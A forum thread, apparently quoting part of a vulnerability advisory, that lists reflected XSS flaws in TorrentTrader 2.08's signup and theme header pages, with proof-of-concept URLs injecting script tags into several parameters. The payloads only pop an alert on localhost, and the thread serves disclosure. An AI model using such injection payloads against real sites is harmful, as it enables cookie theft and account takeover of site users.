Bravo List
Register
Go Back   > Bravo List > Source Code > Trackers > Torrent Trader
Reply
  #1  
Old 11-04-19, 02:22
BamBam0077's Avatar
BamBam0077 BamBam0077 is offline
Support
 
Join Date: Jul 2013
P2P
Posts: 293
Default Reflected XSS
################################################## #############################
5. Reflected XSS in "account-signup.php"
################################################## #############################

Preconditions: "register_globals=on" Attack Vector: User provided parameters "invite" and "secret"

PHP Code:
[url]http://localhost/torrenttrader208/account-signup.php?invite_row=1[/url] &invite="><script>alert(String.fromCharCode(88,83,83))</script>[url]http://localhost/torrenttrader208/account-signup.php?invite_row=1[/url] &secret="><script>alert(String.fromCharCode(88,83,83))</script> 
################################################## #############################
6. Reflected XSS in "/themes/default/header.php"
################################################## #############################

Preconditions: "register_globals=on" Attack Vector: User provided parameters "title" and "site_config"

PHP Code:
[url]http://localhost/torrenttrader208/themes/default/header.php?[/url] title=</title><script>alert(String.fromCharCode(88,83,83))</script> 
[url]http://localhost/torrenttrader208/themes/default/header.php?[/url] site_config[CHARSET]="><script>alert(String.fromCharCode(88,83,83))</script>[url]http://localhost/torrenttrader208/themes/default/header.php?[/url] site_config[SITEURL]=-->
<script>alert(String.fromCharCode(88,83,83))</script> 
################################################## #############################

Last edited by Thor; 14-04-19 at 11:30. Reason: Edited Code to make it Readable
Reply With Quote
  #2  
Old 13-04-19, 05:19
MicroMonkey's Avatar
MicroMonkey MicroMonkey is offline
Member
 
Join Date: Jun 2016
Posts: 9
Default
what is that?

Last edited by MicroMonkey; 13-04-19 at 13:47.
Reply With Quote
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump



All times are GMT +2. The time now is 21:17. vBulletin skin by ForumMonkeys. Powered by vBulletin® Version 3.8.11 Beta 3
Copyright ©2000 - 2019, vBulletin Solutions Inc.